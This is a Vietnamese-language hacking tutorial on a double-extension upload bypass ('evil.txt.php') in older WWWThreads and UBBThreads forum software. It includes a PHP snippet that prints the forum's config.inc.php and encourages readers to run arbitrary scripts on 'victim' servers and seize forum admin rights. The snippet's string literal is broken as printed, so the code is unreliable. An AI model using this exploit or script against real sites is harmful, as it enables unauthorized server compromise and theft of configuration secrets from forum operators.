Lỗi trong WWWThreads, BBThreads :

trang này đã được đọc lần

Đặc điểm của UBBthread là cho upload file, tuy có hạn chế những file được upload nhưng nếu mánh khoé thì chúng ta có thể upload 1 script file và thực hiện script này trên máy server.
Lỗi này xảy ra với WWWThreads và UBBThreads 5.5 Dev11 và những version trở về trước.
UBBthreads kiểm tra các file được upload lên từ bên trái sang phải,có nghĩa là 1 file có dạng aaa.bbb.ccc thì UBBthreads chỉ kiểm tra đến aaa.bbb.Nhưng khi chạy thì 1 file lại được kiểm tra từ phải qua trái để xác định loại của nó.
Như vậy để upload 1 php script thì ta sẽ đặt tên cho script ấy là "evil.txt.php" .
Sau khi upload file này lên thì gọi tới file này,script sẽ được chạy trên server của victim.
Như vậy,chúng ta có thể chạy bất cứ script nào trên server của Victim,còn viiệc chạy script nào là tùy các bạn.
Sau đây là 1 script để xem config của UBBthreads :

:
------------------------------
<?php
$readfile = join("\", file
("../config.inc.php"));
print $readfile;
?>

-------------------------------

Lỗi này rất dễ khai thác,các bạn có thể lấy được quyền Admin của forum trong tầm tay.Lổ hổng thì đã quá rõ ràng, phần còn lại là tùy thuộc vào khả năng cũng như sự chịu khó tìm tòi của bạn.